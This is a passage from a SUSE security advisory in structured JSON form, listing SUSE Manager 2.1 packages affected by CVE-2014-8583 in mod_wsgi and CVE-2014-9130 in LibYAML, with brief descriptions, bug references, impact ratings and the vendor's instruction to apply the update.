"SUSE Manager 2.1:spacewalk-java-postgresql-2.1.165.14-0.7.16.noarch",
"SUSE Manager 2.1:spacewalk-pxt-2.1.60.12-0.7.7.noarch",
"SUSE Manager 2.1:spacewalk-reports-2.1.14.8-0.7.10.noarch",
"SUSE Manager 2.1:spacewalk-search-2.1.14.6-0.7.18.noarch",
"SUSE Manager 2.1:spacewalk-setup-2.1.14.9-0.7.6.noarch",
"SUSE Manager 2.1:spacewalk-setup-jabberd-2.1.0.2-0.7.6.noarch",
"SUSE Manager 2.1:spacewalk-sniglets-2.1.60.12-0.7.7.noarch",
"SUSE Manager 2.1:spacewalk-taskomatic-2.1.165.14-0.7.16.noarch",
"SUSE Manager 2.1:spacewalk-utils-2.1.27.12-0.7.25.noarch",
"SUSE Manager 2.1:spacewalksd-5.0.14.6-0.7.15.s390x",
"SUSE Manager 2.1:struts-1.2.9-162.33.22.noarch",
"SUSE Manager 2.1:supportutils-plugin-susemanager-1.0.3-0.5.5.noarch",
"SUSE Manager 2.1:supportutils-plugin-susemanager-client-1.0.4-0.5.5.noarch",
"SUSE Manager 2.1:suseRegisterInfo-2.1.9-0.7.29.s390x",
"SUSE Manager 2.1:susemanager-2.1.17-0.7.11.s390x",
"SUSE Manager 2.1:susemanager-client-config_en-pdf-2.1-0.15.24.noarch",
"SUSE Manager 2.1:susemanager-install_en-pdf-2.1-0.15.24.noarch",
"SUSE Manager 2.1:susemanager-jsp_en-2.1-0.15.23.noarch",
"SUSE Manager 2.1:susemanager-manuals_en-2.1-0.15.24.noarch",
"SUSE Manager 2.1:susemanager-proxy-quick_en-pdf-2.1-0.15.24.noarch",
"SUSE Manager 2.1:susemanager-reference_en-pdf-2.1-0.15.24.noarch",
"SUSE Manager 2.1:susemanager-schema-2.1.50.11-0.7.8.noarch",
"SUSE Manager 2.1:susemanager-sync-data-2.1.5-0.7.6.noarch",
"SUSE Manager 2.1:susemanager-tools-2.1.17-0.7.11.s390x",
"SUSE Manager 2.1:susemanager-user_en-pdf-2.1-0.15.24.noarch",
"SUSE Manager 2.1:tanukiwrapper-3.2.3-0.10.12.s390x",
"SUSE Manager 2.1:yum-3.2.29-0.19.30.s390x",
"SUSE Manager 2.1:yum-common-3.2.29-0.19.30.s390x",
"SUSE Manager 2.1:zypp-plugin-spacewalk-0.9.8-0.15.51.s390x"
]
}
],
"threats": [
{
"category": "impact",
"date": "2015-02-25T20:05:05Z",
"details": "low"
}
],
"title": "CVE-2014-7812"
},
{
"cve": "CVE-2014-8583",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2014-8583"
}
],
"notes": [
{
"category": "general",
"text": "mod_wsgi before 4.2.4 for Apache, when creating a daemon process group, does not properly handle when group privileges cannot be dropped, which might allow attackers to gain privileges via unspecified vectors.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Manager 2.1:apache2-mod_wsgi-3.3-5.7.17.s390x",
"SUSE Manager 2.1:auditlog-keeper-0.2.3+git.1417708457.eabd1a9-0.7.58.noarch",
"SUSE Manager 2.1:auditlog-keeper-rdbms-0.2.3+git.1417708457.eabd1a9-0.7.58.noarch",
"SUSE Manager 2.1:auditlog-keeper-spacewalk-validator-0.2.3+git.1417708457.eabd1a9-0.7.58.noarch",
"SUSE Manager 2.1:auditlog-keeper-syslog-0.2.3+git.1417708457.eabd1a9-0.7.58.noarch",
"SUSE Manager 2.1:auditlog-keeper-xmlout-0.2.3+git.1417708457.eabd1a9-0.7.58.noarch",
"SUSE Manager 2.1:cobbler-2.2.2-0.54.9.s390x",
"SUSE Manager 2.1:google-gson-2.2.4-0.7.52.noarch",
"SUSE Manager 2.1:libyaml-0-2-0.1.3-0.10.16.11.s390x",
"SUSE Manager 2.1:oracle-config-1.1-0.10.10.16.noarch",
"SUSE Manager 2.1:osa-dispatcher-5.11.33.7-0.7.16.noarch",
"SUSE Manager 2.1:perl-Class-Singleton-1.4-4.13.38.noarch",
"SUSE Manager 2.1:perl-NOCpulse-Object-1.26.13.2-0.7.13.noarch",
"SUSE Manager 2.1:perl-Satcon-1.20.2-0.7.6.noarch",
"SUSE Manager 2.1:perl-auditlog-keeper-client-0.2.3+git.1417708457.eabd1a9-0.7.58.noarch",
"SUSE Manager 2.1:postgresql91-pltcl-9.1.15-0.3.1.s390x",
"SUSE Manager 2.1:pxe-default-image-0.1-0.20.56.noarch",
"SUSE Manager 2.1:python-enum34-1.0-0.7.33.s390x",
"SUSE Manager 2.1:python-gzipstream-1.10.2.2-0.7.6.s390x",
"SUSE Manager 2.1:rhn-custom-info-5.4.22.6-0.7.13.noarch",
"SUSE Manager 2.1:rhnlib-2.5.69.6-0.7.6.s390x",
"SUSE Manager 2.1:rhnmd-5.3.18.4-0.7.15.noarch",
"SUSE Manager 2.1:rhnpush-5.5.71.7-0.7.16.noarch",
"SUSE Manager 2.1:sm-ncc-sync-data-2.1.9-0.7.6.noarch",
"SUSE Manager 2.1:smdba-1.5.1-0.7.6.s390x",
"SUSE Manager 2.1:spacecmd-2.1.25.7-0.7.9.s390x",
"SUSE Manager 2.1:spacewalk-admin-2.1.2.4-0.7.6.noarch",
"SUSE Manager 2.1:spacewalk-backend-2.1.55.15-0.7.11.s390x",
"SUSE Manager 2.1:spacewalk-backend-app-2.1.55.15-0.7.11.s390x",
"SUSE Manager 2.1:spacewalk-backend-applet-2.1.55.15-0.7.11.s390x",
"SUSE Manager 2.1:spacewalk-backend-config-files-2.1.55.15-0.7.11.s390x",
"SUSE Manager 2.1:spacewalk-backend-config-files-common-2.1.55.15-0.7.11.s390x",
"SUSE Manager 2.1:spacewalk-backend-config-files-tool-2.1.55.15-0.7.11.s390x",
"SUSE Manager 2.1:spacewalk-backend-iss-2.1.55.15-0.7.11.s390x",
"SUSE Manager 2.1:spacewalk-backend-iss-export-2.1.55.15-0.7.11.s390x",
"SUSE Manager 2.1:spacewalk-backend-libs-2.1.55.15-0.7.11.s390x",
"SUSE Manager 2.1:spacewalk-backend-package-push-server-2.1.55.15-0.7.11.s390x",
"SUSE Manager 2.1:spacewalk-backend-server-2.1.55.15-0.7.11.s390x",
"SUSE Manager 2.1:spacewalk-backend-sql-2.1.55.15-0.7.11.s390x",
"SUSE Manager 2.1:spacewalk-backend-sql-oracle-2.1.55.15-0.7.11.s390x",
"SUSE Manager 2.1:spacewalk-backend-sql-postgresql-2.1.55.15-0.7.11.s390x",
"SUSE Manager 2.1:spacewalk-backend-tools-2.1.55.15-0.7.11.s390x",
"SUSE Manager 2.1:spacewalk-backend-xml-export-libs-2.1.55.15-0.7.11.s390x",
"SUSE Manager 2.1:spacewalk-backend-xmlrpc-2.1.55.15-0.7.11.s390x",
"SUSE Manager 2.1:spacewalk-base-2.1.60.12-0.7.7.noarch",
"SUSE Manager 2.1:spacewalk-base-minimal-2.1.60.12-0.7.7.noarch",
"SUSE Manager 2.1:spacewalk-base-minimal-config-2.1.60.12-0.7.7.noarch",
"SUSE Manager 2.1:spacewalk-branding-2.1.33.10-0.7.16.s390x",
"SUSE Manager 2.1:spacewalk-certs-tools-2.1.6.5-0.7.10.noarch",
"SUSE Manager 2.1:spacewalk-check-2.1.16.6-0.7.9.noarch",
"SUSE Manager 2.1:spacewalk-client-setup-2.1.16.6-0.7.9.noarch",
"SUSE Manager 2.1:spacewalk-client-tools-2.1.16.6-0.7.9.noarch",
"SUSE Manager 2.1:spacewalk-config-2.1.5.4-0.7.15.noarch",
"SUSE Manager 2.1:spacewalk-doc-indexes-2.1.2.3-0.7.26.noarch",
"SUSE Manager 2.1:spacewalk-grail-2.1.60.12-0.7.7.noarch",
"SUSE Manager 2.1:spacewalk-html-2.1.60.12-0.7.7.noarch",
"SUSE Manager 2.1:spacewalk-java-2.1.165.14-0.7.16.noarch",
"SUSE Manager 2.1:spacewalk-java-config-2.1.165.14-0.7.16.noarch",
"SUSE Manager 2.1:spacewalk-java-lib-2.1.165.14-0.7.16.noarch",
"SUSE Manager 2.1:spacewalk-java-oracle-2.1.165.14-0.7.16.noarch",
"SUSE Manager 2.1:spacewalk-java-postgresql-2.1.165.14-0.7.16.noarch",
"SUSE Manager 2.1:spacewalk-pxt-2.1.60.12-0.7.7.noarch",
"SUSE Manager 2.1:spacewalk-reports-2.1.14.8-0.7.10.noarch",
"SUSE Manager 2.1:spacewalk-search-2.1.14.6-0.7.18.noarch",
"SUSE Manager 2.1:spacewalk-setup-2.1.14.9-0.7.6.noarch",
"SUSE Manager 2.1:spacewalk-setup-jabberd-2.1.0.2-0.7.6.noarch",
"SUSE Manager 2.1:spacewalk-sniglets-2.1.60.12-0.7.7.noarch",
"SUSE Manager 2.1:spacewalk-taskomatic-2.1.165.14-0.7.16.noarch",
"SUSE Manager 2.1:spacewalk-utils-2.1.27.12-0.7.25.noarch",
"SUSE Manager 2.1:spacewalksd-5.0.14.6-0.7.15.s390x",
"SUSE Manager 2.1:struts-1.2.9-162.33.22.noarch",
"SUSE Manager 2.1:supportutils-plugin-susemanager-1.0.3-0.5.5.noarch",
"SUSE Manager 2.1:supportutils-plugin-susemanager-client-1.0.4-0.5.5.noarch",
"SUSE Manager 2.1:suseRegisterInfo-2.1.9-0.7.29.s390x",
"SUSE Manager 2.1:susemanager-2.1.17-0.7.11.s390x",
"SUSE Manager 2.1:susemanager-client-config_en-pdf-2.1-0.15.24.noarch",
"SUSE Manager 2.1:susemanager-install_en-pdf-2.1-0.15.24.noarch",
"SUSE Manager 2.1:susemanager-jsp_en-2.1-0.15.23.noarch",
"SUSE Manager 2.1:susemanager-manuals_en-2.1-0.15.24.noarch",
"SUSE Manager 2.1:susemanager-proxy-quick_en-pdf-2.1-0.15.24.noarch",
"SUSE Manager 2.1:susemanager-reference_en-pdf-2.1-0.15.24.noarch",
"SUSE Manager 2.1:susemanager-schema-2.1.50.11-0.7.8.noarch",
"SUSE Manager 2.1:susemanager-sync-data-2.1.5-0.7.6.noarch",
"SUSE Manager 2.1:susemanager-tools-2.1.17-0.7.11.s390x",
"SUSE Manager 2.1:susemanager-user_en-pdf-2.1-0.15.24.noarch",
"SUSE Manager 2.1:tanukiwrapper-3.2.3-0.10.12.s390x",
"SUSE Manager 2.1:yum-3.2.29-0.19.30.s390x",
"SUSE Manager 2.1:yum-common-3.2.29-0.19.30.s390x",
"SUSE Manager 2.1:zypp-plugin-spacewalk-0.9.8-0.15.51.s390x"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2014-8583",
"url": "https://www.suse.com/security/cve/CVE-2014-8583"
},
{
"category": "external",
"summary": "SUSE Bug 903961 for CVE-2014-8583",
"url": "https://bugzilla.suse.com/903961"
},
{
"category": "external",
"summary": "SUSE Bug 907649 for CVE-2014-8583",
"url": "https://bugzilla.suse.com/907649"
},
{
"category": "external",
"summary": "SUSE Bug 983032 for CVE-2014-8583",
"url": "https://bugzilla.suse.com/983032"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Manager 2.1:apache2-mod_wsgi-3.3-5.7.17.s390x",
"SUSE Manager 2.1:auditlog-keeper-0.2.3+git.1417708457.eabd1a9-0.7.58.noarch",
"SUSE Manager 2.1:auditlog-keeper-rdbms-0.2.3+git.1417708457.eabd1a9-0.7.58.noarch",
"SUSE Manager 2.1:auditlog-keeper-spacewalk-validator-0.2.3+git.1417708457.eabd1a9-0.7.58.noarch",
"SUSE Manager 2.1:auditlog-keeper-syslog-0.2.3+git.1417708457.eabd1a9-0.7.58.noarch",
"SUSE Manager 2.1:auditlog-keeper-xmlout-0.2.3+git.1417708457.eabd1a9-0.7.58.noarch",
"SUSE Manager 2.1:cobbler-2.2.2-0.54.9.s390x",
"SUSE Manager 2.1:google-gson-2.2.4-0.7.52.noarch",
"SUSE Manager 2.1:libyaml-0-2-0.1.3-0.10.16.11.s390x",
"SUSE Manager 2.1:oracle-config-1.1-0.10.10.16.noarch",
"SUSE Manager 2.1:osa-dispatcher-5.11.33.7-0.7.16.noarch",
"SUSE Manager 2.1:perl-Class-Singleton-1.4-4.13.38.noarch",
"SUSE Manager 2.1:perl-NOCpulse-Object-1.26.13.2-0.7.13.noarch",
"SUSE Manager 2.1:perl-Satcon-1.20.2-0.7.6.noarch",
"SUSE Manager 2.1:perl-auditlog-keeper-client-0.2.3+git.1417708457.eabd1a9-0.7.58.noarch",
"SUSE Manager 2.1:postgresql91-pltcl-9.1.15-0.3.1.s390x",
"SUSE Manager 2.1:pxe-default-image-0.1-0.20.56.noarch",
"SUSE Manager 2.1:python-enum34-1.0-0.7.33.s390x",
"SUSE Manager 2.1:python-gzipstream-1.10.2.2-0.7.6.s390x",
"SUSE Manager 2.1:rhn-custom-info-5.4.22.6-0.7.13.noarch",
"SUSE Manager 2.1:rhnlib-2.5.69.6-0.7.6.s390x",
"SUSE Manager 2.1:rhnmd-5.3.18.4-0.7.15.noarch",
"SUSE Manager 2.1:rhnpush-5.5.71.7-0.7.16.noarch",
"SUSE Manager 2.1:sm-ncc-sync-data-2.1.9-0.7.6.noarch",
"SUSE Manager 2.1:smdba-1.5.1-0.7.6.s390x",
"SUSE Manager 2.1:spacecmd-2.1.25.7-0.7.9.s390x",
"SUSE Manager 2.1:spacewalk-admin-2.1.2.4-0.7.6.noarch",
"SUSE Manager 2.1:spacewalk-backend-2.1.55.15-0.7.11.s390x",
"SUSE Manager 2.1:spacewalk-backend-app-2.1.55.15-0.7.11.s390x",
"SUSE Manager 2.1:spacewalk-backend-applet-2.1.55.15-0.7.11.s390x",
"SUSE Manager 2.1:spacewalk-backend-config-files-2.1.55.15-0.7.11.s390x",
"SUSE Manager 2.1:spacewalk-backend-config-files-common-2.1.55.15-0.7.11.s390x",
"SUSE Manager 2.1:spacewalk-backend-config-files-tool-2.1.55.15-0.7.11.s390x",
"SUSE Manager 2.1:spacewalk-backend-iss-2.1.55.15-0.7.11.s390x",
"SUSE Manager 2.1:spacewalk-backend-iss-export-2.1.55.15-0.7.11.s390x",
"SUSE Manager 2.1:spacewalk-backend-libs-2.1.55.15-0.7.11.s390x",
"SUSE Manager 2.1:spacewalk-backend-package-push-server-2.1.55.15-0.7.11.s390x",
"SUSE Manager 2.1:spacewalk-backend-server-2.1.55.15-0.7.11.s390x",
"SUSE Manager 2.1:spacewalk-backend-sql-2.1.55.15-0.7.11.s390x",
"SUSE Manager 2.1:spacewalk-backend-sql-oracle-2.1.55.15-0.7.11.s390x",
"SUSE Manager 2.1:spacewalk-backend-sql-postgresql-2.1.55.15-0.7.11.s390x",
"SUSE Manager 2.1:spacewalk-backend-tools-2.1.55.15-0.7.11.s390x",
"SUSE Manager 2.1:spacewalk-backend-xml-export-libs-2.1.55.15-0.7.11.s390x",
"SUSE Manager 2.1:spacewalk-backend-xmlrpc-2.1.55.15-0.7.11.s390x",
"SUSE Manager 2.1:spacewalk-base-2.1.60.12-0.7.7.noarch",
"SUSE Manager 2.1:spacewalk-base-minimal-2.1.60.12-0.7.7.noarch",
"SUSE Manager 2.1:spacewalk-base-minimal-config-2.1.60.12-0.7.7.noarch",
"SUSE Manager 2.1:spacewalk-branding-2.1.33.10-0.7.16.s390x",
"SUSE Manager 2.1:spacewalk-certs-tools-2.1.6.5-0.7.10.noarch",
"SUSE Manager 2.1:spacewalk-check-2.1.16.6-0.7.9.noarch",
"SUSE Manager 2.1:spacewalk-client-setup-2.1.16.6-0.7.9.noarch",
"SUSE Manager 2.1:spacewalk-client-tools-2.1.16.6-0.7.9.noarch",
"SUSE Manager 2.1:spacewalk-config-2.1.5.4-0.7.15.noarch",
"SUSE Manager 2.1:spacewalk-doc-indexes-2.1.2.3-0.7.26.noarch",
"SUSE Manager 2.1:spacewalk-grail-2.1.60.12-0.7.7.noarch",
"SUSE Manager 2.1:spacewalk-html-2.1.60.12-0.7.7.noarch",
"SUSE Manager 2.1:spacewalk-java-2.1.165.14-0.7.16.noarch",
"SUSE Manager 2.1:spacewalk-java-config-2.1.165.14-0.7.16.noarch",
"SUSE Manager 2.1:spacewalk-java-lib-2.1.165.14-0.7.16.noarch",
"SUSE Manager 2.1:spacewalk-java-oracle-2.1.165.14-0.7.16.noarch",
"SUSE Manager 2.1:spacewalk-java-postgresql-2.1.165.14-0.7.16.noarch",
"SUSE Manager 2.1:spacewalk-pxt-2.1.60.12-0.7.7.noarch",
"SUSE Manager 2.1:spacewalk-reports-2.1.14.8-0.7.10.noarch",
"SUSE Manager 2.1:spacewalk-search-2.1.14.6-0.7.18.noarch",
"SUSE Manager 2.1:spacewalk-setup-2.1.14.9-0.7.6.noarch",
"SUSE Manager 2.1:spacewalk-setup-jabberd-2.1.0.2-0.7.6.noarch",
"SUSE Manager 2.1:spacewalk-sniglets-2.1.60.12-0.7.7.noarch",
"SUSE Manager 2.1:spacewalk-taskomatic-2.1.165.14-0.7.16.noarch",
"SUSE Manager 2.1:spacewalk-utils-2.1.27.12-0.7.25.noarch",
"SUSE Manager 2.1:spacewalksd-5.0.14.6-0.7.15.s390x",
"SUSE Manager 2.1:struts-1.2.9-162.33.22.noarch",
"SUSE Manager 2.1:supportutils-plugin-susemanager-1.0.3-0.5.5.noarch",
"SUSE Manager 2.1:supportutils-plugin-susemanager-client-1.0.4-0.5.5.noarch",
"SUSE Manager 2.1:suseRegisterInfo-2.1.9-0.7.29.s390x",
"SUSE Manager 2.1:susemanager-2.1.17-0.7.11.s390x",
"SUSE Manager 2.1:susemanager-client-config_en-pdf-2.1-0.15.24.noarch",
"SUSE Manager 2.1:susemanager-install_en-pdf-2.1-0.15.24.noarch",
"SUSE Manager 2.1:susemanager-jsp_en-2.1-0.15.23.noarch",
"SUSE Manager 2.1:susemanager-manuals_en-2.1-0.15.24.noarch",
"SUSE Manager 2.1:susemanager-proxy-quick_en-pdf-2.1-0.15.24.noarch",
"SUSE Manager 2.1:susemanager-reference_en-pdf-2.1-0.15.24.noarch",
"SUSE Manager 2.1:susemanager-schema-2.1.50.11-0.7.8.noarch",
"SUSE Manager 2.1:susemanager-sync-data-2.1.5-0.7.6.noarch",
"SUSE Manager 2.1:susemanager-tools-2.1.17-0.7.11.s390x",
"SUSE Manager 2.1:susemanager-user_en-pdf-2.1-0.15.24.noarch",
"SUSE Manager 2.1:tanukiwrapper-3.2.3-0.10.12.s390x",
"SUSE Manager 2.1:yum-3.2.29-0.19.30.s390x",
"SUSE Manager 2.1:yum-common-3.2.29-0.19.30.s390x",
"SUSE Manager 2.1:zypp-plugin-spacewalk-0.9.8-0.15.51.s390x"
]
}
],
"threats": [
{
"category": "impact",
"date": "2015-02-25T20:05:05Z",
"details": "moderate"
}
],
"title": "CVE-2014-8583"
},
{
"cve": "CVE-2014-9130",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2014-9130"
}
],
"notes": [
{
"category": "general",
"text": "scanner.c in LibYAML 0.1.5 and 0.1.6, as used in the YAML-LibYAML (aka YAML-XS) module for Perl, allows context-dependent attackers to cause a denial of service (assertion failure and crash) via vectors involving line-wrapping.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Manager 2.1:apache2-mod_wsgi-3.3-5.7.17.s390x",
"SUSE Manager 2.1:auditlog-keeper-0.2.3+git.1417708457.eabd1a9-0.7.58.noarch",
"SUSE Manager 2.1:auditlog-keeper-rdbms-0.2.3+git.1417708457.eabd1a9-0.7.58.noarch",
"SUSE Manager 2.1:auditlog-keeper-spacewalk-validator-0.2.3+git.1417708457.eabd1a9-0.7.58.noarch",
"SUSE Manager 2.1:auditlog-keeper-syslog-0.2.3+git.1417708457.eabd1a9-0.7.58.noarch",
"SUSE Manager 2.1:auditlog-keeper-xmlout-0.2.3+git.1417708457.eabd1a9-0.7.58.noarch",
"SUSE Manager 2.1:cobbler-2.2.2-0.54.9.s390x",
"SUSE Manager 2.1:google-gson-2.2.4-0.7.52.noarch",
"SUSE Manager 2.1:libyaml-0-2-0.1.3-0.10.16.11.s390x",
"SUSE Manager 2.1:oracle-config-1.1-0.10.10.16.noarch",
"SUSE Manager 2.1:osa-dispatcher-5.11.33.7-0.7.16.noarch",
"SUSE Manager 2.1:perl-Class-Singleton-1.4-4.13.38.noarch",
"SUSE Manager 2.1:perl-NOCpulse-Object-1.26.13.2-0.7.13.noarch",
"SUSE Manager 2.1:perl-Satcon-1.20.2-0.7.6.noarch",
"SUSE Manager 2.1:perl-auditlog-keeper-client-0.2.3+git.1417708457.eabd1a9-0.7.58.noarch",
"SUSE Manager 2.1:postgresql91-pltcl-9.1.15-0.3.1.s390x",
"SUSE Manager 2.1:pxe-default-image-0.1-0.20.56.noarch",
"SUSE Manager 2.1:python-enum34-1.0-0.7.33.s390x",
"SUSE Manager 2.1:python-gzipstream-1.10.2.2-0.7.6.s390x",
"SUSE Manager 2.1:rhn-custom-info-5.4.22.6-0.7.13.noarch",
"SUSE Manager 2.1:rhnlib-2.5.69.6-0.7.6.s390x",
"SUSE Manager 2.1:rhnmd-5.3.18.4-0.7.15.noarch",
"SUSE Manager 2.1:rhnpush-5.5.71.7-0.7.16.noarch",
"SUSE Manager 2.1:sm-ncc-sync-data-2.1.9-0.7.6.noarch",
"SUSE Manager 2.1:smdba-1.5.1-0.7.6.s390x",
"SUSE Manager 2.1:spacecmd-2.1.25.7-0.7.9.s390x",
"SUSE Manager 2.1:spacewalk-admin-2.1.2.4-0.7.6.noarch",
"SUSE Manager 2.1:spacewalk-backend-2.1.55.15-0.7.11.s390x",
"SUSE Manager 2.1:spacewalk-backend-app-2.1.55.15-0.7.11.s390x",
"SUSE Manager 2.1:spacewalk-backend-applet-2.1.55.15-0.7.11.s390x",
"SUSE Manager 2.1:spacewalk-backend-config-files-2.1.55.15-0.7.11.s390x",
"SUSE Manager 2.1:spacewalk-backend-config-files-common-2.1.55.15-0.7.11.s390x",
"SUSE Manager 2.1:spacewalk-backend-config-files-tool-2.1.55.15-0.7.11.s390x",
"SUSE Manager 2.1:spacewalk-backend-iss-2.1.55.15-0.7.11.s390x",
"SUSE Manager 2.1:spacewalk-backend-iss-export-2.1.55.15-0.7.11.s390x",
"SUSE Manager 2.1:spacewalk-backend-libs-2.1.55.15-0.7.11.s390x",
"SUSE Manager 2.1:spacewalk-backend-package-push-server-2.1.55.15-0.7.11.s390x",
"SUSE Manager 2.1:spacewalk-backend-server-2.1.55.15-0.7.11.s390x",
"SUSE Manager 2.1:spacewalk-backend-sql-2.1.55.15-0.7.11.s390x",
"SUSE Manager 2.1:spacewalk-backend-sql-oracle-2.1.55.15-0.7.11.s390x",
"SUSE Manager 2.1:spacewalk-backend-sql-postgresql-2.1.55.15-0.7.11.s390x",
"SUSE Manager 2.1:spacewalk-backend-tools-2.1.55.15-0.7.11.s390x",
"SUSE Manager 2.1:spacewalk-backend-xml-export-libs-2.1.55.15-0.7.11.s390x",
"SUSE Manager 2.1:spacewalk-backend-xmlrpc-2.1.55.15-0.7.11.s390x",
"SUSE Manager 2.1:spacewalk-base-2.1.60.12-0.7.7.noarch",
"SUSE Manager 2.1:spacewalk-base-minimal-2.1.60.12-0.7.7.noarch",
"SUSE Manager 2.1:spacewalk-base-minimal-config-2.1.60.12-0.7.7.noarch",
"SUSE Manager 2.1:spacewalk-branding-2.1.33.10-0.7.16.s390x",
"SUSE Manager 2.1:spacewalk-certs-tools-2.1.6.5-0.7.10.noarch",
"SUSE Manager 2.1:spacewalk-check-2.1.16.6-0.7.9.noarch",
"SUSE Manager 2.1:spacewalk-client-setup-2.1.16.6-0.7.9.noarch",
"SUSE Manager 2.1:spacewalk-client-tools-2.1.16.6-0.7.9.noarch",
"SUSE Manager 2.1:spacewalk-config-2.1.5.4-0.7.15.noarch",
"SUSE Manager 2.1:spacewalk-doc-indexes-2.1.2.3-0.7.26.noarch",
"SUSE Manager 2.1:spacewalk-grail-2.1.60.12-0.7.7.noarch",
"SUSE Manager 2.1:spacewalk-html-2.1.60.12-0.7.7.noarch",
"SUSE Manager 2.1:spacewalk-java-2.1.165.14-0.7.16.noarch",
"SUSE Manager 2.1:spacewalk-java-config-2.1.165.14-0.7.16.noarch",
"SUSE Manager 2.1:spacewalk-java-lib-2.1.165.14-0.7.16.noarch",
"SUSE Manager 2.1:spacewalk-java-oracle-2.1.165.14-0.7.16.noarch",
"SUSE Manager 2.1:spacewalk-java-postgresql-2.1.165.14-0.7.16.noarch",
"SUSE Manager 2.1:spacewalk-pxt-2.1.60.12-0.7.7.noarch",
"SUSE Manager 2.1:spacewalk-reports-2.1.14.8-0.7.10.noarch",
"SUSE Manager 2.1:spacewalk-search-2.1.14.6-0.7.18.noarch",
"SUSE Manager 2.1:spacewalk-setup-2.1.14.9-0.7.6.noarch",
"SUSE Manager 2.1:spacewalk-setup-jabberd-2.1.0.2-0.7.6.noarch",
"SUSE Manager 2.1:spacewalk-sniglets-2.1.60.12-0.7.7.noarch",
"SUSE Manager 2.1:spacewalk-taskomatic-2.1.165.14-0.7.16.noarch",
"SUSE Manager 2.1:spacewalk-utils-2.1.27.12-0.7.25.noarch",
"SUSE Manager 2.1:spacewalksd-5.0.14.6-0.7.15.s390x",
"SUSE Manager 2.1:struts-1.2.9-162.33.22.noarch",
"SUSE Manager 2.1:supportutils-plugin-susemanager-1.0.3-0.5.5.noarch",
"SUSE Manager 2.1:supportutils-plugin-susemanager-client-1.0.4-0.5.5.noarch",
"SUSE Manager 2.1:suseRegisterInfo-2.1.9-0.7.29.s390x",
"SUSE Manager 2.1:susemanager-2.1.17-0.7.11.s390x",
"SUSE Manager 2.1:susemanager-client-config_en-pdf-2.1-0.15.24.noarch",
"SUSE Manager 2.1:susemanager-install_en-pdf-2.1-0.15.24.noarch",
"SUSE Manager 2.1:susemanager-jsp_en-2.1-0.15.23.noarch",
"SUSE Manager 2.1:susemanager-manuals_en-2.1-0.15.24.noarch",
"SUSE Manager 2.1:susemanager-proxy-quick_en-pdf-2.1-0.15.24.noarch",
"SUSE Manager 2.1:susemanager-reference_en-pdf-2.1-0.15.24.noarch",
"SUSE Manager 2.1:susemanager-schema-2.1.50.11-0.7.8.noarch",
"SUSE Manager 2.1:susemanager-sync-data-2.1.5-0.7.6.noarch",
"SUSE Manager 2.1:susemanager-tools-2.1.17-0.7.11.s390x",
"SUSE Manager 2.1:susemanager-user_en-pdf-2.1-0.15.24.noarch",
"SUSE Manager 2.1:tanukiwrapper-3.2.3-0.10.12.s390x",
"SUSE Manager 2.1:yum-3.2.29-0.19.30.s390x",
"SUSE Manager 2.1:yum-common-3.2.29-0.19.30.s390x",
"SUSE Manager 2.1:zypp-plugin-spacewalk-0.9.8-0.15.51.s390x"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2014-9130",
"url": "https://www.suse.com/security/cve/CVE-2014-9130"
},
{
"category": "external",
"summary": "SUSE Bug 907809 for CVE-2014-9130",
"url": "https://bugzilla.suse.com/907809"
},
{
"category": "external",
"summary": "SUSE Bug 911782 for CVE-2014-9130",
"url": "https://bugzilla.suse.com/911782"
},
{
"category": "external",
"summary": "SUSE Bug 921588 for CVE-2014-9130",
"url": "https://bugzilla.suse.com/921588"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Manager 2.1:apache2-mod_wsgi-3.3-5.7.17.s390x",
"SUSE Manager 2.1:auditlog-keeper-0.2.3+git.1417708457.eabd1a9-0.7.58.noarch",
"SUSE Manager 2.1:auditlog-keeper-rdbms-0.2.3+git.1417708457.eabd1a9-0.7.58.noarch",
"SUSE Manager 2.1:auditlog-keeper-spacewalk-validator-0.2.3+git.1417708457.eabd1a9-0.7.58.noarch",
"SUSE Manager 2.1:auditlog-keeper-syslog-0.2.3+git.1417708457.eabd1a9-0.7.58.noarch",
"SUSE Manager 2.1:auditlog-keeper-xmlout-0.2.3+git.1417708457.eabd1a9-0.7.58.noarch",
"SUSE Manager 2.1:cobbler-2.2.2-0.54.9.s390x",
"SUSE Manager 2.1:google-gson-2.2.4-0.7.52.noarch",
"SUSE Manager 2.1:libyaml-0-2-0.1.3-0.10.16.11.s390x",
"SUSE Manager 2.1:oracle-config-1.1-0.10.10.16.noarch",
"SUSE Manager 2.1:osa-dispatcher-5.11.33.7-0.7.16.noarch",
"SUSE Manager 2.1:perl-Class-Singleton-1.4-4.13.38.noarch",
"SUSE Manager 2.1:perl-NOCpulse-Object-1.26.13.2-0.7.13.noarch",
"SUSE Manager 2.1:perl-Satcon-1.20.2-0.7.6.noarch",
"SUSE Manager 2.1:perl-auditlog-keeper-client-0.2.3+git.1417708457.eabd1a9-0.7.58.noarch",
"SUSE Manager 2.1:postgresql91-pltcl-9.1.15-0.3.1.s390x",
"SUSE Manager 2.1:pxe-default-image-0.1-0.20.56.noarch",
"SUSE Manager 2.1:python-enum34-1.0-0.7.33.s390x",
"SUSE Manager 2.1:python-gzipstream-1.10.2.2-0.7.6.s390x",
"SUSE Manager 2.1:rhn-custom-info-5.4.22.6-0.7.13.noarch",
"SUSE Manager 2.1:rhnlib-2.5.69.6-0.7.6.s390x",
"SUSE Manager 2.1:rhnmd-5.3.18.4-0.7.15.noarch",
"SUSE Manager 2.1:rhnpush-5.5.71.7-0.7.16.noarch",
"SUSE Manager 2.1:sm-ncc-sync-data-2.1.9-0.7.6.noarch",
"SUSE Manager 2.1:smdba-1.5.1-0.7.6.s390x",
"SUSE Manager 2.1:spacecmd-2.1.25.7-0.7.9.s390x",
"SUSE Manager 2.1:spacewalk-admin-2.1.2.4-0.7.6.noarch",
"SUSE Manager 2.1:spacewalk-backend-2.1.55.15-0.7.11.s390x",
"SUSE Manager 2.1:spacewalk-backend-app-2.1.55.15-0.7.11.s390x",
